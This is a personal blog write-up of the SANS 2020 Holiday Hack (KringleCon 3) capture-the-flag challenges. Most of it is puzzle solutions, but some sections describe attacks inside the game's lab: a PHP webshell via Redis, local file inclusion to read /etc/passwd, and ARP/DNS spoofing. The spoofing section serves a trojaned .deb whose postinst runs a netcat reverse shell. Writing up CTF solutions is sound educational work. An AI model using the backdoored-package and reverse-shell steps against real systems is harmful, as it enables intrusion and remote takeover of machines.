Kringlecon 3: French Hens

[ ctf  challenges  ]

SANS 2020 Holiday Hack

Journey begins…

Talk to Jingle Ringford and Objective 01 is unlocked
alt text

Objective 01: Uncover Santa's Gift List

Question: what gift is Santa planning on getting Josh Wright for the holidays?

In the upper left-hand corner there is a billboard with an image.

Clicking the image gives a high-rez version where you can see Santa’s List and download the file. There are hints to use a tools to find the answer, but it can be done if you look closely :) Correct answer is: proxmark

Taking the jump to the Entry room, Shiny Upatree has a terminal challenge and an objective to complete

Terminal Challenge: Kringle Kiosk

Challenge is to break out of the menu map to /bin/bash. Solution is to choose Option 4, enter &/bin/bash
alt text
alt text

Objective 02: Investigate S3 Bucket

Question: When you unwrap the over-wrapped file, what text string is inside the package?

First part of the objective, is to use the tool bucket_finder that’s provided to scan public S3 buckets and find/download the correct file
alt text
To do this, update the wordlist with the highlighted green word Wrapper3000 (upper & lower) from the intro, then scan.
alt text
Then go through a series of commands to sucessfully upwrap the file or package
alt text
This gives the answer of North Pole: The Frostiest Place on Earth

Terminal Challenge: Unescape Tmux

Pepper Minstix has a tmux terminal challenge
alt text
alt text
The answer is simply tmux attach

Before moving into the Great Hall, pick up a candy cane as an item
alt text

Talk to Sparkle Redberry, a Elevator Service Key is obtained
alt text alt text

Talk to Ginger Breddie, told of a half floor on the elevator and pickup a Hex Nut
alt text alt text

Moving to the Dining Room, Rob Bonbowford has The Elf Code challenges

Elf Code Challenges

Code to beat Level 01

Code to beat Level 02 - Trigger The Yeeter
var sum = elf.get_lever(0) + 2

Code to beat Level 03 - Move To Loopiness

Code to beat Level 04 - Up Down Loopiness
for (let i = 0; i < 2; i++) { elf.moveLeft(2), elf.moveUp(40), elf.moveLeft(2), elf.moveDown(40) }

Code to beat Level 05 - Move To Madness
elf.moveTo(lollipop[1, 0])
var value = elf.ask_munch(0)
var answer = value.filter(Number.isInteger)

Code to beat Level 06 - Two Paths, Your Choice
for (let i = 0; i < 4; i++) { elf.moveTo(lollipop[i]) }
var answer = elf.get_lever(0)
answer.unshift(“munchkins rule”)

Terminal Challenge: Redis Bug Hunt

Holly Evergreen has a Redis terminal challenge

See that you can run Redis commands using curl and the maintenance page

Write a php webshell, using the link that was provided in the hints

Using that webshell, call index.php to resolve the challenge

33.6kbps Challenge

Fitzy Shortstack has a challenge to complete a handshake for a modem. The phone number is given: 756-8347

To solve, pickup handset, dial the number given and choose the sounds in the following order:

baa DEE brrr

Moving to the Courtyard, Sugarplum Mary has a Linux Primer Terminal Challenge and Objective 3

Terminal Challenge: Linux Primer

This challenge has several linux commands to run in order to get all the candy canes

Twenty questions to this challenge with answers in orange

  1. Perform a directory listing of your home directory to find a munchkin and retrieve a lollipop! ls
  2. Now find the munchkin inside the munchkin. cat munchkin_19315479765589239
  3. Great, now remove the munchkin in your home directory. rm munchkin_19315479765589239
  4. Print the present working directory using a command. pwd
  5. Good job but it looks like another munchkin hid itself in you home directory. Find the hidden munchkin! ls -alh
  6. Excellent, now find the munchkin in your command history. history
  7. Find the munchkin in your environment variables. env
  8. Next, head into the workshop. cd workshop
  9. A munchkin is hiding in one of the workshop toolboxes. Use “grep” while ignoring case to find which toolbox the munchkin is in. grep -ir munchkin
  10. A munchkin is blocking the lollipop_engine from starting. Run the lollipop_engine binary to retrieve this munchkin. chmod +x lollipop_engine && ./lollipop_engine
  11. Munchkins have blown the fuses in /home/elf/workshop/electrical. cd into electrical and rename blown_fuse0 to fuse0. cd electrical/ && mv blown_fuse0 fuse0
  12. Now, make a symbolic link (symlink) named fuse1 that points to fuse0 ln -s fuse0 fuse1
  13. Make a copy of fuse1 named fuse2. cp fuse1 fuse2
  14. We need to make sure munchkins don’t come back. Add the characters “MUNCHKIN_REPELLENT” into the file fuse2. echo “MUNCHKIN_REPELLENT” » fuse2
  15. Find the munchkin somewhere in /opt/munchkin_den. cd /opt/munchkin_den && ls -alhR . | grep -i munchkin
  16. Find the file created by munchkins that is greater than 108 kilobytes and less than 110 kilobytes located somewhere in /opt/munchkin_den. find . -size +108k -size -110k
  17. List running processes to find another munchkin. ps -aux
  18. The 14516_munchkin process is listening on a tcp port. Use a command to have the only listening port display to the screen. netstat -ant
  19. The service listening on port 54321 is an HTTP server. Interact with this server to retrieve the last munchkin. curl http://localhost:54321
  20. Your final task is to stop the 14516_munchkin process to collect the remaining lollipops. pkill 14516_munchkin

Challenge completed

Objective 3: Point-of-Sale Password Recovery

Question: What’s the password for the Point-of-Sale Terminal
An offline version of the electron application is available for download to recover the terminal password.

Running the .exe, installs the app and gives a password prompt

Using the link provided in the hints, install asar and extract the source

From this the password is found: santapass

Objective completed

Still in the Courtyard, a green light bulb is found in the upper left-hand side of the area

Objective 4: Operate the Santavator

Heading back to the Entry room, time to operate the Elevator
Given the buttons, there is a key that gives way how to power the elevator

Moving the green lightbulb and the hex nut to direct the steam, it powers the elevator to get to level 2

Objective completed

On the Talks floor, a red light bulb is found upper right-hand corner of the room

Terminal Challenge: Speaker UNPrep

Bushy Evergreen holds three challengs in one for the Speaker UNPrep challenge

Door app

Running strings against the door, password is reveal: Op3nTheD00r

Door Open!

Lights app

In lab section, updating the name to the same as the encrypted password reveals the password when running the app

Lights On!

Vending Machine app

Looking at the .json config file for the app, there is an encoded password

Deleting the .json config file in the lab section, allows you to create name and password

Looking at the new .json file, you see santa name encoded

After some trial and error, the password is revealed: CandyCane1
Vending Machine enabled!

Moving into the room off of the talks lobby, in the lower right-hand corner, the button for the elevator floor 1.5 is found

Checking the vending machine, a portals object is revealed

Moving to the Dining Room, another Hex Nut can be found on the top side of the dining table

Snowball Fight Challenge

Beat the game on Impossible setting
Tangle Coalbox has a game with four different levels to beat

Extra Instances:
The player name corresponds to the arrangement of the opponent’s board.

Simply hit on all the necessary squares before your opponent

Strategy for beating Easy through Hard:

  1. Easy: trival as you can beat the opponent without running out of turns.
  2. Medium: can be easily won as you can choose your name and simply choose the same as when you won Easy
  3. Hard: you cannot choose your own name, but you can see it once you start. Simply spin up a new instance under Easy with same name/number

Winning on Easy-Hard

To complete Impossible level, it’s recommended to watch the Mersene Twister talk and/or use the tool here
Next when starting the game, it’s shown the player ID is redacted

However if you look at the source, you’ll find 624 random numbers in the source along with the redacted one

To find this redacted number, take the 624 numbers and add to a clean file. Then cat that file while piping to the Mersene Twister app and print the first outputted number using head -1

Finding that number, spin up another instance playing on Easy to find where to attack. Using that data, the impossible level can be beat.

Moving back to the elevator, it’s now possible to power red and green. This opens both floors 1.5 (Workshop) and rooftop (NetWars)

Taking the elevator to the Workshop, a Large Marble object is found.

Terminal Challenge: Sort-O-Matic

Minty Candycane needs help with the sort-o-matic machine

Regex is need to solve the challenge

\d [azAZ] [a-z0-9]{2} ^(?!.?[A-L1-5]). ^[0-9]{3,}$ ^(((([0-1][0-9])|(2[0-3])):?[0-5][0-9]:?[0-5][0-9]+$)) ^[a-fA-F0-9]{2}(:[a-fA-F0-9]{2}){5}$ ^(0[1-9]|1[0-4])\/.-\/.-\d{2}$

Challenge solved

Moving up a room, a Large Marble object is found.

In the same room, a Proxmark3 device is found

Objective 5: Open HID Lock

Use the interactive Proxmark3 device to solve objective 5 and open the door to the Sorting room

Device allows for interaction

Prox Ids can be captured from elves using auto from the device

Correct Prox Id is found on Bow Ninecandle

Heading back to the locked door in the sorting room, using the correct command and Prox Id, the door unlocks

Objective completed. This opens up six new objectives.

From the new room there is a light at the end, going through our character becomes santa :)

With this change, the teleport option opens which makes moving around easier

Objective 6: Splunk Challenge

Question: What is the name of the adversary group that Santa feared would attack KringleCon?

Moving to the Great Room, find Angel Candysalt with the next Objective

Eight total questions in this challenge using Splunk:

  1. How many distinct MITRE ATT&CK techniques did Alice emulate?)
    Answer: 13
  2. What are the names of the two indexes that contain the results of emulating Enterprise ATT&CK technique 1059.003? (Put them in alphabetical order and separate them with a space)
    Answer: t1059.003-main t1059.003-win
  3. One technique that Santa had us simulate deals with ‘system information discovery’. What is the full name of the registry key that is queried to determine the MachineGuid?
    Answer: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography
  4. According to events recorded by the Splunk Attack Range, when was the first OSTAP related atomic test executed? (Please provide the alphanumeric UTC timestamp.)
    Answer: 2020-11-30T17:44:15Z
  5. One Atomic Red Team test executed by the Attack Range makes use of an open source package authored by frgnca on GitHub. According to Sysmon (Event Code 1) events in Splunk, what was the ProcessId associated with the first use of this component?
    Answer: 3648
  6. Alice ran a simulation of an attacker abusing Windows registry run keys. This technique leveraged a multi-line batch file that was also used by a few other techniques. What is the final command of this multi-line batch file used as part of this simulation?
    Answer: quser
  7. According to x509 certificate events captured by Zeek (formerly Bro), what is the serial number of the TLS certificate assigned to the Windows domain controller in the attack range?
    Answer: 55FCEEBB21270D9249E86F4B9DC7AA60
  8. What is the name of the adversary group that Santa feared would attack KringleCon?
    Answer: The Lollipop Guild

Final answer is solved using the hints given (Ciphertext: 7FXjP1lyfKbyDK/MChyf36h7) and (RFC7465: RC4)
By watching Adversary Emulation and Automation talk Santa’s phrase can be obtained
Use CyberChef and decode

Moving to the NetWars floor, Wunorse Openslae holds the next terminal challenage and Objective 7

First the YelloW Light Bulb for the elevator can be found next to Wunorse

Objective 7: Solve the Sleigh's CAN-D-BUS Problem

Requires two entries to filter out the bad codes

Following codes are determined:
Start: 02A#00FF00
Stop: 02A#0000FF
Lock: 19B#000000000000
Unlock: 19B#00000F000000
Steering: 019 - ALL
Brake: 080 - ALL

Correct Filters to solve:
19B Equals 0000000F2057
080 Contains FFF

Terminal Challenge: CAN-Bus Investigation

Like the objective, this file needs to be filtered

Using the unlock code 19B#00000F000000 found from the objective, this can easily be found in the file using grep

With a timestamp of 1608926671.122520, just submit 122520 to answer

Heading to Wrapping Room, to talk with Noel Boetie for the next Objective

Objective 8: Broken Tag Generator

Question: What value is in the environment variable GREETZ?

Given the tag generator link, it would seem an upload is possible using the interface

In Chrome Dev Tools, the image can be found and called directly using id=

Uploading a .php fails, but reveals the path that it’s stored in

After some trial and error, an LFI is found and can read /etc/passwd

Answer is found in /proc/self/environ of JackFrostWasHere

Heading back to NetWars floor, Alabaster Snowball has a Terminal challenge and Objective 9

Terminal Challenge: Scapy Prepper

15 Scapy questions followed by answers in orange:

  1. Start by running the task.submit() function passing in a string argument of ‘start’. task.submit(‘start’)
  2. Submit the class object of the scapy module that sends packets at layer 3 of the OSI model. task.submit(send)
  3. Submit the class object of the scapy module that sniffs network packets and returns those packets in a list. task.submit(sniff)
  4. Submit the NUMBER only from the choices below that would successfully send a TCP packet and then return the first sniffed response packet to be stored in a variable named “pkt”: task.submit(1)
    1. pkt = sr1(IP(dst=””)/TCP(dport=20))
    2. pkt = sniff(IP(dst=””)/TCP(dport=20))
    3. pkt = sendp(IP(dst=””)/TCP(dport=20))
  5. Submit the class object of the scapy module that can read pcap or pcaPNG” files and return a list of packets. task.submit(rdpcap)
  6. The variable UDP_PACKETS contains a list of UDP packets. Submit the NUMBER only from the choices below that correctly prints a summary of UDP_PACKETS:task.submit(2)
    1. UDP_PACKETS.print()
    3. UDP_PACKETS.list()
  7. Submit only the first packet found in UDP_PACKETS. task.submit(UDP_PACKETS[0])
  8. Submit only the entire TCP layer of the second packet in TCP_PACKETS. pkt = TCP_PACKETS[1] task.submit(pkt[TCP])
  9. Change the source IP address of the first packet found in UDP_PACKETS to and then submit this modified packet pkt[IP].src = ‘’ task.submit(pkt[IP])
  10. Submit the password “task.submit(‘elf_password’)” of the user alabaster as found in the packet list TCP_PACKETS. TCP_PACKETS[6] task.submit(‘echo’)
  11. The ICMP_PACKETS variable contains a packet list of several icmp echo-request and icmp echo-reply packets. Submit only the ICMP chksum value from the second packet in the ICMP_PACKETS list. ICMP_PACKETS[1][ICMP].chksum task.submit(19524)
  12. Submit the number of the choice below that would correctly create a ICMP echo request packet with a destination IP of stored in the variable named “pkt” task.submit(3)
    1. pkt = Ether(src=’’)/ICMP(type=”echo-request”)
    2. pkt = IP(src=’’)/ICMP(type=”echo-reply”)
    3. pkt = IP(dst=’’)/ICMP(type=”echo-request”)
  13. Create and then submit a UDP packet with a dport of 5000 and a dst IP of (all other packet attributes can be unspecified) pkt = IP(dst=’’)/UDP(dport=5000)
  14. Create and then submit a UDP packet with a dport of 53, a dst IP of, and is a DNS query with a qname of “elveslove.santa”. (all other packet attributes can be unspecified) pkt = IP(dst=’’)/UDP(dport=53)/DNS(rd=1,qd=DNSQR(qname=’elveslove.santa’))
  15. The variable ARP_PACKETS contains an ARP request and response packets. The ARP response (the second packet) has 3 incorrect fields in the ARP layer. Correct the second packet in ARP_PACKETS to be a proper ARP response and then task.submit(ARP_PACKETS) for inspection. pkt = ARP_PACKETS[1] pkt[ARP].hwsrc=’00:13:46:0b:22:ba’ pkt[ARP].hwdst=’00:16:ce:6e:8b:24’ task.submit(ARP_PACKETS)

Objective 9: ARP Shenanigans

Retrieve the document at /NORTH_POLE_Land_Use_Board_Meeting_Minutes.txt. Who recused herself from the vote described on the document?
For this challenge spoofing ARP and DNS is necessary, then find a manner to send a malicious .deb package in order to read the file listed
There are both ARP and DNS starter scripts in the /scripts folder and .deb packages in the /debs folder

ARP Spoof
Need to find the mac of using tcpdump -nei eth0 which is 4c:24:57:ab:ed:84

Get local info using ifconfig and local IP is with mac 02:42:0a:06:00:06

Next update the ARP script with this information

With tcpdump running, kick off the updated arp script. There should be a response that is at the local mac address and a dns query to

Then update the DNS script the information obtained

With tcpdump running, kick off both the updated arp and dns scripts. Leveraging the ability to have multiple terminal windows open. Additional traffic will show

In the additional traffic there is a call to port 80. With the same setup before, add an additional window with a listner on port 80. This reveals a call to a .deb package

Loosely following guide by Offensive Security here, a reverse can be obtained.
Package/System setup with the following commands:
dpkg -x netcat-traditional_1.10-41.1ubuntu1_amd64.deb workdir
mkdir -p workdir/DEBIAN
dpkg-deb -e netcat-traditional_1.10-41.1ubuntu1_amd64.deb
cp DEBIAN/postinst DEBIAN/control workdir/DEBIAN/
/bin/nc -e /bin/bash 1337
dpkg-deb –build workdir/
mkdir -p pub/jfrost/backdoor
cp workdir.deb pub/jfrost/backdoor/suriv_amd64.deb
cd ~/debs/
python3 -m http.server 80
nc -nlvvp 1337

With both a listener for the reverse shell and the web download, the DNS script can be triggered, and followed by the ARP script. And a reverse shell on the system

Reading the output of the document, Tanta Kringle is the answer for the objective.

Objective 10: Defeat Fingerprint Sensor

Bypass the fingerprint sensor on the elevator
For next object, switch back to normal self by going to Entry room and head through the painting of Santa
First get elevator to full power now that the Yellow Light bulb has been obtained

Looking in the dev tools of Chrome, it’s easy to see there is an object to besanta

Simply add this to the iframe, the page reloads and the scan fingerprint is allowed

Tinsel Upatree holds the clue for the next Objective, but our character must be Santa
Switching back, the next clue is a blockchain.dat file available for download here. Also, Tinsel provides some tools to help in the next objective available for download here

Objective 11a: Naughty/Nice List with Blockchain Investigation Part 1

Even though the chunk of the blockchain that you have ends with block 129996, can you predict the nonce for block 130000?
Provided in the tools is a necessary python script and certificates. First step is to update the script to get information out of the blockchain file.
The following code is uncommented in the script, with modification:
with open(‘official_public.pem’, ‘rb’) as fh:
    official_public_key = RSA.importKey(
    c2 = Chain(load=True, filename=’blockchain.dat’)
print(‘C2: Block chain verify: %s’ % (c2.verify_chain(official_public_key)))

This prints out one block starting @ 128449. It needs to go to 129996 according to the objective.
Code update. Replace print(c2.blocks[0]) with the following:
for i in range(1548):

Running the script again produces all blocks up to 129996, giving us a total of 1548 blocks.
Next extract the Nonces:
./ > output
cat output | grep Nonce > nonces
cat nonces |cut -c 22-38 > real_nonces

Running these commands gives a total of 1548 nonces, but this needs to be cutdown to 624 for the Mersene Twister. This is done by removing all Nonces before 925.
However because the Mersene Twister is 32-bit, the nonces need to be converted from hex to binary and split into upper an lower. This means the 624 needs to be cut to 312, so all Nonces before 1237 need to be removed.

Following code will produce 312 upper and 312 lower 32 bit numbers, one right after another. This should be run and outputted to a file
f = open(‘real_nonces’, “r”)
lines = f.readlines()
for g in lines:
    s = int(g,16)
     o = s & 0xffffffff
     i = (s » 32)

Using these numbers it can be run against the Merene Twister and predict the next 16 bit numbers (upper and lower). Challenge states nonce 130000 and the output ended at 129996, so run the following command and grab the last two numbers needed:
cat converted_split_nonces | mt19937predict | head -n 8

From python cli, the hex number for nonce 130000 can be determined by converting the upper and lower halves back and combining, then converting decimal to hex: a = 4079973021
b = 1460036376
c = b « 32 | a

This yields the answer, which is submitted without the 0x

Objective 11b: Naughty/Nice List with Blockchain Investigation Part 2

SHA256 of Jack’s altered block is: 58a3b9335a6ceb0234c12d35a0564c4e f0e90152d0eb2ce2082383b38028a90f What is the SHA256 of the original block that was altered by changing only 4 bytes?

Still using the blockchain.dat file, it can be determined it holds PDF files by using strings. Seeing that the SHA256 of the block is required for the answer, it seems the individual blocks can be saved to file as well. The code dump_doc and save_a_block can be used to do this as stated in the script

With this information the for loop in the script can be updated to not only print the blocks, but also write the PDF and block files by adding this code:

This creates a lot of files so move the .pdf and .dat files to individual subfolders. Then run the following in the folder containing the .dat files:
sha256sum * | grep 58a3b9335a6ceb0234c12d35a0564c4e

This produces a result of 3f2block.dat to match. Copying this file up a folder in order to later work with, it’s notice a file 129459.bin is present. Examining that file with strings and the blockfile, it’s determined that two files should have been extracted when running the original script. However only the bin file was and the PDF 129459 wasn’t as it’s not in the pdf folder.

To obtain the pdf, it must be extracted from the blockfile. First comment out the pdf/dat file writes in the naughty nice script. Then run the script with the following options:
python3 | grep -A 20 129459 > 129459.block

That command extracts the necessary information to a temp file. Next is to remove all data from that temp file except for the actual data from Data Type 2 (I did this from a text editor). Next:

  1. Create a new file called 129459.pdf with at least 1 byte of data
  2. Copy the data from the temp file
  3. Run hexedit against that newly create file
  4. Paste the copied data into the hex editor, overwriting that one byte of data, and save

The missing PDF should now open

Before making any changes, take note of some file information:

  1. md5sum 3f2block.dat = b10b4a6bd373b61f32f4fd3a0cdfbf84 (This should not change when making the first 2 byte change or the final 4 byte changes)
  2. sha256sum 3f2block.dat = 58a3b9335a6ceb0234c12d35a0564c4ef0e90152d0eb2ce2082383b38028a90f (This should change and final answer is derived from this)

For next and final steps, it’s recommended to review the slides here. For what to do, page 194 contains the how to make changes and recommended to download as a PDF and zoom in.

So first follow in the slide what’s easy to read and update the Pages from 2 to 3 using hexedit for the pdf file. This will change the output of the pdf to the following

Now decrease the byte 40 bytes off from where you made the first change. In this instance, the first change was at 3F, so the next change is at 7f. The value there is 1C, so it needs to be decreased to 1B

Making these same 2 byte changes to the .dat file should no change the md5sum. While the 40 byte offset remains, where the changes are made will be different.

For the next changes, look at the block again using the script. It would seem that it’s necessary to change the Sign from Nice (1) to Naughty (0) since Jack needs to be added to that list

This requires to make the change using hexedit at offset 49, decreasing the byte from 30 to 31. Like the other change to the PDF, move to the 40 byte offset and this time increase by one byte

These changes do not alter the md5sum of the block, but a new sha256sum is displayed which is our answer
sha256sum 3f2block.dat = fff054f33c2134e0230efb29dad515064ac97aa8c68d33c58c01213a0d408afb

Thanks for the challenges Holiday Hack crew!!!

Full Narrative

KringleCon back at the castle, set the stage...
But it's under construction like my GeoCities page.
Feel I need a passport exploring on this platform -
Got half floors with back doors provided that you hack more!
Heading toward the light, unexpected what you see next:
An alternate reality, the vision that it reflects.
Mental buffer's overflowing like a fast food drive-thru trash can.
Who and why did someone else impersonate the big man?
You're grepping through your brain for the portrait's "JFS"
"Jack Frost: Santa," he's the villain who had triggered all this mess!
Then it hits you like a chimney when you hear what he ain't saying:
Pushing hard through land disputes, tryin' to stop all Santa's sleighing.
All the rotting, plotting, low conniving streaming from that skull.
Holiday Hackers, they're no slackers, returned Jack a big, old null!
Written on January 13, 2021
Share on: